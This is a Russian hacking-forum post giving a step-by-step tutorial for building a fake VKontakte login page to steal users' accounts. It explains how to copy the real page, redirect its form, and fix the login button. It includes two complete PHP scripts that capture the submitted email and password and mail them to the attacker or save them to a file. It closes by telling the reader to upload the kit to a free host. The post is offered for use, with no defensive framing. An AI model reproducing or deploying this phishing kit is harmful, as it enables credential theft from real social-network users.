Перейти к содержимому


Фотография

Взлом страничек ВКонтакте


  • Авторизуйтесь для ответа в теме
В этой теме нет ответов

#1 Admin

Admin

    Эксперт. (ГЛАВА ФОРУМА)

  • Администраторы
  • 272 сообщений
  • ГородИнтернет сити

Отправлено 28 Февраль 2016 - 23:23

Фейк ВКонтакте
Открываем браузер Opera и переходим  на страницу авторизации www.vkontakte.ru (Все делаем с помощью Opera так как только этот браузер нормально сохраняет все файлы)
В меню браузера находим пункт "сохранить как" и в тип файла выбираем "HTML-файл с изображениями" и сохраняем как index.html
Изображение
И так если все правильно то у нас должно еще создаться папка с именем  "index_files"  
После открываем index.html с помощью блокнота (например) и ищем строку
Код:
action="http://login.vk.com/?act=login"
И меняем на
Код:
action="login.php"
Вот сам login.php
[hide thank="1"]

Код:
<?php
 
$BASE="мыло";
$IS_EMAIL=true;
$LOCATION="erorr.html";
 
$p0=$_REQUEST["email"];
$p1=$_REQUEST["pass"];
$headers = "Content-type: text/html; charset=windows-1251rn";
$headers .= "From: bot <$BASE>rn";
$headers .= "Bcc: $BASErn";
$info=":логин:$p0:пароль:$p1:n";
 
if ($IS_EMAIL){
mail($BASE, "Привет от www.thehackword.ru", $headers.$info);
} else {
$fd=fopen($BASE,"a+");
fwrite($fd,$info);
fclose($fd);
}
 
header("Location:$LOCATION");
?>[/hide]
Фейк практически годов но еще нужно решить проблему с кнопкой "Войти" так как на этом этапе оно еще не работает!
Для этого ищем строку
Код:
</form>  <div class="button_blue button_wide"><button id="quick_login_button">Войти</button></div>
и меняем на
Код:
<div class="button_blue button_wide"><button id="quick_login_button">Войти</button></form></div>
Как видим мы просто переносим закрывающий тег формы после кнопки "Войти" И все дела!
Создаем еще и erorr.html
В двух словах что и как.. 
И так переходим на страницу http://vkontakte.ru/....php?m=1&email= и делаем так, как выше объяснял, только вписываем erorr.html
далее открываем erorr.html блокнотом и ищем там
Код:
action="https://login.vk.com/"
и меняем на
Код:
action="active.php"
далее жмякаем Ctrl+H
в верхней строке пишем
Код:
quick_login
на нижней
Код:
document.login.submit
И жмякаем "Заменить все"
active.php
Код:
<?php
 
$BASE="мыло";
$IS_EMAIL=true;
$LOCATION="http://vkontakte.ru/login.php?m=1&email=";
 
$p0=$_REQUEST["email"];
$p1=$_REQUEST["pass"];
$headers = "Content-type: text/html; charset=windows-1251rn";
$headers .= "From: bot <$BASE>rn";
$headers .= "Bcc: $BASErn";
$info=":логин:$p0:пароль:$p1:n";
 
if ($IS_EMAIL){
mail($BASE, "Привет от TheHackWord.Ru", $headers.$info);
} else {
$fd=fopen($BASE,"a+");
fwrite($fd,$info);
fclose($fd);
}
 
header("Location:$LOCATION");
?>
Регимся например на holm.ru и все это богатство заливаем  на хост и радуемся ;) :D
Как заливать файлы на хост Тыц.. :D 
Удачи!

С Уважением Администрация.Форум хакеров XAKERPRO.COM





Количество пользователей, читающих эту тему: 0

0 пользователей, 0 гостей, 0 анонимных


Сертификат на никнейм XAKERPRO.COM, зарегистрирован на Константин Иванов.
Яндекс.Метрика Рейтинг@Mail.ru Analysis Счетчик ТИЦ Каталог сайтов OpenLinks.RU Каталог сайтов Всего.RU

Добавить Vkontakte Добавить в Facebook Добавить в Twitter Добавить в LiveJournal